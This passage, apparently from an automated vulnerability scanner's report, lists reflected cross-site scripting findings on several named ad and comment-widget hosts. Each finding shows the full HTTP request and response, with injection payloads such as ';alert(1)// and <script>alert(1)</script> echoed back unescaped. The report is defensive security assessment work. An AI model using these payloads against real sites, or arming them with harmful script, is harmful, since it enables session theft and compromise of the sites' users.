GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=2660d%3balert(1)//b550bd280e9&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:21 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87727

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
isRatedByMe: F
var ka_mediaId = "1234";
var ka_isRatedByMe = "";
var ka_mediaTags = "";
var ka_alertBadLoginMsg = "Log in Failed. Please check your login credentials and try again.";
var ka_pageSize = 2660d;alert(1)//b550bd280e9;
var ka_forgotPasswdLink = 'http://ulocal.wptz.com/user/displayUserForgotPwd.kickAction?as=62976&STATUS=MAIN';
var ka_timezoneAbbr ='EST';
var ka_timezoneOffset = -4;
/********************************
...[SNIP]...

1.72. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [tzAbbr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the tzAbbr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e88bb'%3balert(1)//6b713801453 was submitted in the tzAbbr parameter. This input was echoed as e88bb';alert(1)//6b713801453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=ESTe88bb'%3balert(1)//6b713801453&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:18 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87703

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
heck your login credentials and try again.";
var ka_pageSize = 5;
var ka_forgotPasswdLink = 'http://ulocal.wptz.com/user/displayUserForgotPwd.kickAction?as=62976&STATUS=MAIN';
var ka_timezoneAbbr ='ESTe88bb';alert(1)//6b713801453';
var ka_timezoneOffset = -7;
/**********************************************************
* Globals
**********************************************************/
if(typeof(RPXNOW)!="undefined"){
   
...[SNIP]...

1.73. http://clientapps.kickapps.com/hearst/comments/start.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/start.php

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cdc2'%3balert(1)//f7110da1efd was submitted in the id parameter. This input was echoed as 9cdc2';alert(1)//f7110da1efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/start.php?as=62976&id=http://www.wptz.com/news/27483035/detail.html9cdc2'%3balert(1)//f7110da1efd&n=Guard%20Prepares%20For%20Possible%20Federal%20Shutdown&d=The%20head%20of%20the%20Vermont%20National%20Guard%20says%20a%20federal%20shutdown%20would%20put%20around%20400%20members%20on%20furlough%20and%20hundreds%20more%20working%20but%20unsure%20when%20they%20would%20be%20paid.&tzAbbr=EST HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:31 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 941

function verifyDomain() {
   var currentLocation = new String(window.location.href);
   var ka_communitySite = new String('http://ulocal.wptz.com/');
   //alert('current location:'+currentLocation+' ka_comm
...[SNIP]...
ion.indexOf(ka_communitySite)!=-1){
       return false;
   }
   return true;
}

var ka_request = 'http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html9cdc2';alert(1)//f7110da1efd&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Fe
...[SNIP]...

1.74. http://clientapps.kickapps.com/hearst/comments/start.php [tzAbbr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/start.php

Issue detail

The value of the tzAbbr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c020a'%3balert(1)//c58225a0fcb was submitted in the tzAbbr parameter. This input was echoed as c020a';alert(1)//c58225a0fcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/start.php?as=62976&id=http://www.wptz.com/news/27483035/detail.html&n=Guard%20Prepares%20For%20Possible%20Federal%20Shutdown&d=The%20head%20of%20the%20Vermont%20National%20Guard%20says%20a%20federal%20shutdown%20would%20put%20around%20400%20members%20on%20furlough%20and%20hundreds%20more%20working%20but%20unsure%20when%20they%20would%20be%20paid.&tzAbbr=ESTc020a'%3balert(1)//c58225a0fcb HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:54 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 941

function verifyDomain() {
   var currentLocation = new String(window.location.href);
   var ka_communitySite = new String('http://ulocal.wptz.com/');
   //alert('current location:'+currentLocation+' ka_comm
...[SNIP]...
l+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=ESTc020a';alert(1)//c58225a0fcb&pSize=&dName=&loginAtBottom=';
if (verifyDomain()){
   ka_loadCommentsForm();

   
}

function ka_loadCommentsForm(){
   
       
       aObj = new JSONscriptRequest(ka_request);
       aObj.buildScriptTag();
       
...[SNIP]...

1.75. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed80e"-alert(1)-"40a53fb6c70 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=ed80e"-alert(1)-"40a53fb6c70&z=144475929 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Tue, 10 Apr 2012 16:41:23 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=My@jTcGt89atDQZBkeuqQvnQ~041111;expires=Thu, 08 Apr 2021 16:41:23 GMT;domain=.zedo.com;path=/;
ETag: "7140dca9-4239-48dea89497900"
Vary: Accept-Encoding
X-Varnish: 2551699253
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=33
Date: Mon, 11 Apr 2011 16:41:23 GMT
Connection: close
Content-Length: 3161

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


               
...[SNIP]...
7;g=172;m=34;w=51;i=0;u=unknown;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=ed80e"-alert(1)-"40a53fb6c70http://www.newsmax.com/surveys/DonaldTrump/Donald-Trump-for-President-/id/11/kw/default?PROMO_CODE=BF8D-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOu
...[SNIP]...

1.76. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f741"-alert(1)-"6ea924cc82f was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=3f741"-alert(1)-"6ea924cc82f&z=655102444 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1; ZEDOIDA=Ly@jTcGt89Y-7tVXMtikPSik~041111; FFgeo=2241452; ZEDOIDX=29

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "199c199-4429-48dea89497900"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1482268137
Cache-Control: max-age=185
Expires: Mon, 11 Apr 2011 17:24:30 GMT
Date: Mon, 11 Apr 2011 17:21:25 GMT
Connection: close
Content-Length: 2164

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


                   var zzSt
...[SNIP]...
=unknown;p=6;f=1045847;h=966322;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=3f741"-alert(1)-"6ea924cc82fhttp://news1.newsmax.com/repeal/?PROMO_CODE=BE0A-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

1.77. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v10-003/d7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6171f"-alert(1)-"f47e5bad5e1 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v10-003/d7/jsc/flr.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=6171f"-alert(1)-"f47e5bad5e1&z=144475929 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Tue, 10 Apr 2012 16:41:25 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=NS@jTcGt89Z-2ItluoIEWYR-~041111;expires=Thu, 08 Apr 2021 16:41:25 GMT;domain=.zedo.com;path=/;
ETag: "7140dca9-4239-48dea89497900"
Vary: Accept-Encoding
X-Varnish: 2551699253
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=31
Date: Mon, 11 Apr 2011 16:41:25 GMT
Connection: close
Content-Length: 3120

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


               
...[SNIP]...
=unknown;p=6;f=1045847;h=966322;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=6171f"-alert(1)-"f47e5bad5e1http://news1.newsmax.com/repeal/?PROMO_CODE=BE0A-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

1.78. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ingeniux.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 13036<script>alert(1)</script>2aba7ef527a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.ingeniux.com/p.json?callback=_ate.ad.hpr13036<script>alert(1)</script>2aba7ef527a&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.ingeniux.com%2Fsolutions%2Fwebsite_optimization&1rvjqwy HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1302197723.1FE|1302197723.60|1302197723.66; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 373
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:18:16 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:18:16 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308296.1FE|1302308296.60|1302197723.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:18:15 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:18:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:16 GMT
Connection: close

_ate.ad.hpr13036<script>alert(1)</script>2aba7ef527a({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.ingeniu
...[SNIP]...

1.79. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.marqui.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 66809<script>alert(1)</script>0ed15865e19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.marqui.com/p.json?callback=_ate.ad.hpr66809<script>alert(1)</script>0ed15865e19&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.marqui.com%2Fcompany%2Fcontact-us%2F&ref=http%3A%2F%2Fwww.marqui.com%2F&18q07bs HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1302308295.60|1302308295.1FE|1302197723.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 459
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:22:00 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:22:00 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308520.1FE|1302308520.60|1302308520.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:21:59 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:22:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:22:00 GMT
Connection: close

_ate.ad.hpr66809<script>alert(1)</script>0ed15865e19({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.marqui.
...[SNIP]...

1.80. http://ds.addthis.com/red/psi/sites/www.wcax.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wcax.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 63658<script>alert(1)</script>12e32e4184e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.wcax.com/p.json?callback=_ate.ad.hpr63658<script>alert(1)</script>12e32e4184e&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.wcax.com%2F&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18196&1dw210o HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1302308519.1FE|1302308519.60|1302308519.66; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 12:31:40 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 12:31:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 12:31:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:31:40 GMT
Connection: close

_ate.ad.hpr63658<script>alert(1)</script>12e32e4184e({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

1.81. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4f34'-alert(1)-'106a47e4832 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-16&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..c4f34'-alert(1)-'106a47e4832&referrer=http://www.wcax.com/Global/category.asp&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
